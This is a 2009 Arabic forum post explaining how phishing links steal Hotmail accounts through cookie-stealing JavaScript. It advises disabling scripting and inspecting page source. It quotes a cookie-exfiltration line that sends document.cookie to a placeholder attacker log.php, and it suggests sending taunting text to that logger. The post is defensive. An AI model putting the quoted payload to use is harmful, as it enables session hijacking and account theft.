| |||||||
 |
| | LinkBack | أدوات الموضوع | انواع عرض الموضوع |
09-01-2009, 07:26 PM
| رقم المشاركة : 1 (permalink) |
 حماية بردك من الاختراق عبر سرقة الكوكيز بسم الله الرحمن الرحيم اليوم عملت شرح لموضوع سرقة بريد الهوت ميل وهى طريقة سرقة ملف الكوكيز الخاص بيك بعد دخولك على موقع السارق عارفين ان ثغرة xss للهوتميل اتقفلت من زمااان لكن ظهرت ثغرات جديده حاليا وهيا برايفت عند ناس ومناسبة الشرح ده اني لاحظت مئات الايميلات الثلاثية والثنائيات يخترقوهم هؤلاء اللي معاهم الثغرة ماعلينا اليوم بعد ما تقرأ الموضوع ده انسى ان واحد يضحك عليك  نفترض وصلتلك رسالة على البريد مضمونها اهلاً بك يا فلان مبروك ربحت 10000 ريال ادخل على الرابط التالي علشان تاخد الـ 10000 ريال طبعا انت فرحان ودخلت علطول  وبعد ما دخلت ما لقيت شيء  ممكن تلاقي صفحة بيضة ممكن تلاقي صورة بس  تقول خسارة مليش نصيب في المبلغ طبعا بعدها بدقايق كان المخترق جاتله رساله ملف الكوكيز تبعك ودخل غير كل البيانات  وراح الاميل عليك طبعا انت تقول الاميل انا كنت حميه و ماقبلتش اي حاجة من حد وكيف اميلى ينسرق وبعدها طبعا السارق دخل سحب باقى البيانات ومنها الدومين واخترق منتداك كمان وكل ده من اميلك لاااااااااااااا  دلوقتي بقى انا هخليك انت الى تضحك عليه وتحرق دمه خليكو معايا وانتبهو جيدا ده مثال للرسالة اللي جاتلك وكان فيها الرابط  استنة رايح فين اياك تفتح الرابط !هتفتحه بس بعد ما تتبع الخطوات التالية : تعديل بسيط على اعدادات انترنت اكسبلورر روح على tools واختار internet options اللي هو اخر خيار  بعدين تروح على security واضغط على custom level  بعد كده ابحث عن Active Scripting وهي خاصية الجافا سكربت قم بتعطيلها من خلال اختيارك Disable  الان انت فى امان ولو فتحت الصفحة مش هينسرق ملف الكوكيز بتاعك ادخل على الصفحة بقلب جامد بعد التاكد من ان خاصية الجافا وجعلها دسبلاي طيب الان انت دخلت الصفحة وعاوز تتأكد اذا ده واحد هدفه يسرق ايميلك والا لأ تعمل ايه ؟! روح من القائمة view اختار Source هيفتحلك مصدر الصفحة في مفكره فيها اكواد الصفحة طيب ابحث فيها عن الكود ده  هذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 776x414 . طبعا اكيد انتم شايفين ده عباره عن كود وفى اخره رابط السكربت بتاع المخترق علشان يسرق الكوكيز وده هو الملف بتاع سرقة الكوكيز معمول بخاصية الجافا سكربت عشان كده قلتلك عطل الجافا سكربت في المتصفح طبعا انت شفت الرابط الى فى اخر الكود www.xxx.com/vb/add.js طيب دلوقتى انت عرفت المصدر دلوقتى بقى انت عايز تحرق دمه  وتعرفه انك انسان عاقل وفاهم  ادخل على المتصفح وحط رابط ملف سرقة الكوكيز بتاع المخترق www.xxx.com/vb/add.js هيطلب منك انك تحمله حمله على جهازك واضغط عليه كلك يمين واختار open with واختار النوت باد  طبعا انت دخلت على ملف الجافا سكربت لقيته كده طبعا انت مش فاهم ايه ده ؟؟؟؟؟؟ اقولك انا يا سيدى ده ملف سرقة الكوكيز ما علينا مش هطول عليكم وهقولكم الباقى عايز دلوقتى تجنينه وتخنقه وتخليه يشيييييييييط lo cat ion .h ref='http://www.xxxx.com/xxx/log.php?in de x='+escape(d ocu ment.c oo kie); طبعا هو فى الملف log.php فيه اميل المخترق تمااام دلوقتى احنا عايزين نوصله التحية بتاعتنا ونعرفه ان لعبته اتقفشت هتكتب كود PHP: www.xxxxx.com/xxx/log.php?index= وهنا اكتب الكلام الى عايزه يوصل للضحية مثل هذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 766x101 . طيب تمام طبعا علطول بيروح تبيلغ للمخترق ان الكوكيز بتاع وصله  وهيدخل وهو مبسوط وهيلاقى فى الرساله بدل الكوكيز الكلام بتاعك اللي انت كتبته شوفو مثال :  طبعا هو ممكن ينفجر من الغيظ كده خلص موضوعنا ونصيحة للجميع اعمل لايميلك سؤال سري واجابة وايميل بديل يكون بتاعك علشان تسترجعه وقت اللزوم وبرنامج حماية قوي علشان يحميك من ملفات التجسس  واهم شيء استخدام متصفح غير الاكسبلورر ممكن تستخدمو فايرفوكس مع التحديث دائما مثلي  تحياتي للجميع EGY-MaF!4 plhdm fv]; lk hghojvhr ufv svrm hg;,;d. التعديل الأخير تم بواسطة EDMN HkR ; 09-01-2009 الساعة 07:32 PM. | |
|
|  |
|
| مواقع النشر (المفضلة) |
« الموضوع السابق
|
الموضوع التالي »
| أدوات الموضوع | |
| انواع عرض الموضوع | |
العرض العادي
|
|
المواضيع المتشابهه | ||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| أخر اصدرات برامج الاختراق+سرقة كمرة الهوتميل + الى اخره | zahgan | قـسـم الـبـريد الإلـكتروني والحسابات العامة | 9 | 02-14-2010 05:02 PM |
| طريقك الى حماية منتداك من الاختراق احمى المنتدى 100% | THE GHOST | قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات | 2 | 09-06-2008 05:15 AM |
الساعة الآن 05:56 AM
SEO by vBSEO 3.6.0